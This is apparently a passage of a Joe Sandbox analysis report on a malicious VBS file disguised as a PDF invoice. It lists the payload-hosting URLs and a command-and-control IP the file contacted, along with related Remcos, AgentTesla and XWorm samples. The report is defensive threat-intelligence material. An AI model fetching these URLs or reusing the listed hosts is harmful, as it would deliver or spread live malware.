https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	0%	Avira URL Cloud	safe
https://urn.to/r/sds_see	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	14%	Virustotal		Browse
http://app01.system.com.br/RDWeb/Pages/login.aspx0	0%	Virustotal		Browse
https://urn.to/r/sds_seeaCould	0%	Virustotal		Browse
91.92.242.85	100%	Avira URL Cloud	malware
http://app01.system.com.br/RDWeb/Pages/login.aspx	0%	Avira URL Cloud	safe
https://urn.to/r/sds_see	0%	Virustotal		Browse
http://app01.system.com.br/RDWeb/Pages/login.aspxd	0%	Virustotal		Browse
http://app01.system.com.br/RDWeb/Pages/login.aspx	0%	Virustotal		Browse
https://bomdokasw.ru.com/ghj.txt	10%	Virustotal		Browse
91.92.242.85	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	104.21.84.67	true	false		high
uploaddeimagens.com.br	104.21.45.138	true	true	7%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
bomdokasw.ru.com	66.90.95.11	true	true	5%, Virustotal, Browse	unknown
time.windows.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/thAhY	false		high
https://bomdokasw.ru.com/ghj.txt	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
91.92.242.85	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://duckduckgo.com/ac/?q=	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://paste.ee/d/thAhYolume4Z	wscript.exe, 00000000.00000003.1420751978.0000022662E30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422666211.0000022662E33000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://go.microsoft.co	powershell.exe, 0000000E.00000002.1999796603.0000013243D28000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://paste.ee/d/thAhYs	wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com;	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://analytics.paste.ee	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspx0	wscript.exe, 00000000.00000003.1197893332.00000226647C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198150141.00000226647CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198174575.00000226647CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197929809.00000226647CE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 0000000E.00000002.1963089159.000001322BCBE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://www.ecosia.org/newtab/	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.raw.18.dr	false		high
https://urn.to/r/sds_seeaCould	MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/d/thAhYf/	wscript.exe, 00000000.00000003.1420883430.0000022664EAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421166233.0000022664EAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423363714.0000022664EB2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspxd	wscript.exe, 00000000.00000003.1419126722.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197941339.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198115471.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198078112.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420035528.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197984079.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1418175988.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198036947.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197842875.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421320095.00000226647F0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://www.google.com	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	MSBuild.exe, 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://www.newtonsoft.com/jsonschema	MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000000.00000003.1420751978.0000022662E46000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspxT	wscript.exe, 00000000.00000002.1422666211.0000022662E81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420751978.0000022662E81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://analytics.paste.ee;	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.nuget.org/packages/Newtonsoft.Json.Bson	MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 0000000E.00000002.1963089159.000001322BCDE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	places.raw.18.dr	false		high
https://urn.to/r/sds_see	MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.1963089159.000001322BD0F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspx	wscript.exe, 00000000.00000003.1421104712.0000022662DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419126722.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422613838.0000022662E16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421357637.0000022662DF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197941339.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198115471.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198078112.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197756704.00000226647D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419126722.00000226647DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420035528.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421048524.0000022662DCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197984079.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197804781.0000022662DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1418175988.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198036947.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421011003.00000226647C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422666211.0000022662E81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420751978.0000022662E81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1422054641.00000226647C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423056331.00000226647C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197842875.00000226647EE000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	places.raw.18.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.45.138	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
66.90.95.11	bomdokasw.ru.com	United States	174	COGENT-174US	true
91.92.242.85	unknown	Bulgaria	34368	THEZONEBG	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433862
Start date and time:	2024-04-30 07:58:21 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Factura.PDF______________________________________.vbs
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winVBS@10/22@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 19 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 168.61.215.74, 40.127.169.103, 72.21.81.240, 192.229.211.108, 20.3.187.198, 13.95.31.18
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:59:28	API Interceptor	1x Sleep call for process: wscript.exe modified
07:59:33	API Interceptor	43x Sleep call for process: powershell.exe modified
09:50:57	API Interceptor	809797x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.45.138	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse
	Shipment Receipts20240425.vbs	Get hash	malicious	Unknown	Browse
	upload.vbs	Get hash	malicious	VenomRAT	Browse
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse
	gmb.xls	Get hash	malicious	Unknown	Browse
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse
66.90.95.11	http://crisgiano.sa.com	Get hash	malicious	HTMLPhisher	Browse
	http://crisgiano.sa.com	Get hash	malicious	Unknown	Browse
	https://r20.rs6.net/tn.jsp?f=001iv8RXBraOwtuVKXJ2y_68h-bd0nNuBI7zvxiu2i5gyZNWL6D36wVM9cb45sZ8pjjX4EUtu7D3wZdavYTVjC33qKIY28g4o6KUlV2nGpUuWFHwtpXqT9nBQ0l2gpK2CcqhLZJhN222ljqULFwhKdFZA==&c=&ch=$#c2FyYS5hbGxlbkBzb2pvdXJucy5vcmc=	Get hash	malicious	Unknown	Browse
	dagrejses.com	Get hash	malicious	FormBook, GuLoader	Browse
91.92.242.85	Maersk_BL_208268807.exe	Get hash	malicious	Remcos, zgRAT	Browse
	Maersk_MRKU8781602.exe	Get hash	malicious	Remcos	Browse
	AWB_5331810761.exe	Get hash	malicious	Remcos	Browse
	RXtmwI.exe	Get hash	malicious	Remcos	Browse
	AWB_5331810787.exe	Get hash	malicious	Remcos	Browse
104.21.84.67	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://mdhby62yvvg6sd5jmx5gsyucs7ynb5j45lvvdh4dsymg43puitu7tfid.onion/post/NmFiNzY4NzdmNWQ0MTAzNWViMjZmYT	Get hash	malicious	Unknown	Browse	192.229.211.108
	PO 2942024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.229.211.108
	MCvYYNUoC9OqLwf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.229.211.108
	dm7DlGGnm36sQec.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.229.211.108
	kWmkgbfE6RlDSAS.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.229.211.108
	Ez76m3j18V.exe	Get hash	malicious	LummaC	Browse	192.229.211.108
	.exe	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://maryland.gov/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://cpierceworld.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://zieonlineshop.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
paste.ee	Acil sipari#U015f.xls	Get hash	malicious	Unknown	Browse	172.67.187.200
	N#U00f3mina abril 2024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	CARTASCONF_PDF.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	f0SAGZqfAD.rtf	Get hash	malicious	Unknown	Browse	104.21.84.67
	upload.vbs	Get hash	malicious	VenomRAT	Browse	172.67.187.200
	update.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	windows.vbs	Get hash	malicious	XWorm	Browse	104.21.84.67
	file.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	C0S913RP6N.rtf	Get hash	malicious	Unknown	Browse	104.21.84.67
	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	Get hash	malicious	Remcos	Browse	104.21.84.67
uploaddeimagens.com.br	N#U00f3mina abril 2024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	104.21.45.138
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse	104.21.45.138
	CARTASCONF_PDF.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	Shipment Receipts20240425.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	upload.vbs	Get hash	malicious	VenomRAT	Browse	104.21.45.138
	update.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	windows.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	file.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	https://uploaddeimagens.com.br/images/001/894/856/original/Logo_Email_Advisia.png?1550069603	Get hash	malicious	Unknown	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Acil sipari#U015f.xls	Get hash	malicious	Unknown	Browse	172.67.206.230
	PO-682.vbs	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	inquiry_03942_04632_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	TC0931AC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.67.191.112
	N#U00f3mina abril 2024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.206.230
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	104.21.45.138
	FT_AR_9000069595_1.4.7.117_26042024.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	172.67.74.152
	http://metamask.toyosol.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	W7EzWEmSx9.exe	Get hash	malicious	SmokeLoader	Browse	104.21.13.240
COGENT-174US	Om15eLtJ8qVFiGX.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	38.173.103.15
	Quote Request.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	50.7.84.74
	http://email.instantbusinessresources.com/ls/click?upn=u001.TIY-2FPK2B26YDxpiFn13HurCJRQHHdpMpApsmoFIgfFrDSrIjjIK11lo5DmKpLTlHpDov_-2FqjIqHBf1f3iRyjPy42y42T6t77ZUZEtx0K8Bm57DA9-2FFYtNvmuQpl152AiYMHzk83XpcrG-2FLYwz-2F57oFiweltvCdrbGqpPvZV6ypfRXlZG-2Fxr4cWzAJ7GFhNviMRnB3o4vpbbatx9ulw6CdofBqRtSJaOU-2FDPV7bJBeVmPGfOi2SmSGuY5uQj-2BuS-2BcbY62QS-2FJ6TElpxRD-2Bw90RPEVBvhdAMxEZnHhd5D94spmjpP0hmaaVN-2FS8coykIthaHB-2BzI2WLRO3nYJ8Dn7ylU2XLyzzKvFMW7j7CODCp73m0HbdaLXntoVMeYQl3ZTAzHkR4lNDIAB587m-2BB8lmCsMJdKDfaTgx2C6K3YQigO7yTcXBJIzYT4trY9diG7Q3vWJkE5toWipHZaPgLSGVLLMBijbs8lQaEpW5En6Q3IKSq4-2FH-2FppvFWaQr6n-2FZkMi2oBAW6mzoVwEGyZmai-2BvVttsqNguk6MjhjMe1yF4u03Dcb14G-2FKoQHArPFW1WL5ifndttCcu50-2FyBFR1Jm8toyUHmRKRe-2FdAwTJ3sT2Si-2FthNXTgM-2FUbMRQ9p7-2BJ-2F7d19KtvmBXRmRJ0iPAprRHoYLHygYg-3D-3D	Get hash	malicious	HTMLPhisher	Browse	38.180.122.100
	Review_and_sign_today CFA_Agreements0001.14.pdf..msg	Get hash	malicious	HTMLPhisher	Browse	38.180.122.100
	gVPlpwuoVV.elf	Get hash	malicious	Mirai	Browse	38.57.116.96
	Scan307.exe	Get hash	malicious	FormBook	Browse	38.47.237.193
	2cO52KdAG9.elf	Get hash	malicious	Mirai	Browse	38.245.255.59
	TsDTSDr8mU.elf	Get hash	malicious	Mirai	Browse	206.62.82.45
	cZg9Vk7f2z.elf	Get hash	malicious	Mirai	Browse	38.142.165.153
	0t102oBJAv.elf	Get hash	malicious	Mirai	Browse	38.118.59.113
THEZONEBG	gK5vkTm6WAcfbiz.exe	Get hash	malicious	Nanocore, PureLog Stealer	Browse	91.92.245.231
	https://royalmailsis.buzz/	Get hash	malicious	Unknown	Browse	91.92.247.249
	Ro8zgGY3GZ.exe	Get hash	malicious	PureLog Stealer	Browse	91.92.244.154
	TCke75ESG2.elf	Get hash	malicious	Gafgyt	Browse	91.92.254.116
	a.cmd	Get hash	malicious	Unknown	Browse	91.92.249.117
	ztVUah3Wy9.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.240.43
	OTpMIf3qBf.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.240.43
	aZxA9dZCxS.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.240.43
	NPXiAZtvNq.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.240.43
	ndVOUQPH8q.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.240.43
CLOUDFLARENETUS	Acil sipari#U015f.xls	Get hash	malicious	Unknown	Browse	172.67.206.230
	PO-682.vbs	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	inquiry_03942_04632_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	TC0931AC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.67.191.112
	N#U00f3mina abril 2024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.206.230
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	104.21.45.138
	FT_AR_9000069595_1.4.7.117_26042024.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	172.67.74.152
	http://metamask.toyosol.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	W7EzWEmSx9.exe	Get hash	malicious	SmokeLoader	Browse	104.21.13.240

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	DHL0000879654982647865424.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.98.116.138
	TC0931AC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.98.116.138
	.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.98.116.138
	http://mdhby62yvvg6sd5jmx5gsyucs7ynb5j45lvvdh4dsymg43puitu7tfid.onion/post/NmFiNzY4NzdmNWQ0MTAzNWViMjZmYT	Get hash	malicious	Unknown	Browse	104.98.116.138
	PO 2942024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.98.116.138
	rCurrent_Vendor_Payment_Application_Form_PDF.cmd	Get hash	malicious	DBatLoader, Remcos	Browse	104.98.116.138
	q4Mb8hVR9R.exe	Get hash	malicious	PureLog Stealer	Browse	104.98.116.138
	https://bafybeigjxmg3ulqmytt642sjwzluuvy7s2m2z4xbd4pqokaid5z3upavoi.ipfs.cf-ipfs.com/#robert.brightful@maryland.gov	Get hash	malicious	HTMLPhisher	Browse	104.98.116.138
	https://amex.shuguangcd.com/	Get hash	malicious	Unknown	Browse	104.98.116.138
	https://hello-world-square-dew-5dd3.bejeka6988.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.98.116.138
3b5074b1b5d032e5620f69f9f700ff0e	DHL0000879654982647865424.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.90.95.11 104.21.45.138
	1000901 LIQUIDACION_pdf.vbs	Get hash	malicious	Unknown	Browse	66.90.95.11 104.21.45.138
	PO-682.vbs	Get hash	malicious	AgentTesla	Browse	66.90.95.11 104.21.45.138
	DHL0000879654982647865428.vbs	Get hash	malicious	Unknown	Browse	66.90.95.11 104.21.45.138
	inquiry_03942_04632_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.90.95.11 104.21.45.138
	DIMETAL PENDENTES.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.90.95.11 104.21.45.138
	pago.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.90.95.11 104.21.45.138
	HSBC0002904024-PDF.vbs	Get hash	malicious	Unknown	Browse	66.90.95.11 104.21.45.138
	Barotse.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.90.95.11 104.21.45.138
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	66.90.95.11 104.21.45.138
37f463bf4616ecd445d4a1937da06e19	DHL0000879654982647865424.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	inquiry_03942_04632_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	DIMETAL PENDENTES.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	pago.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
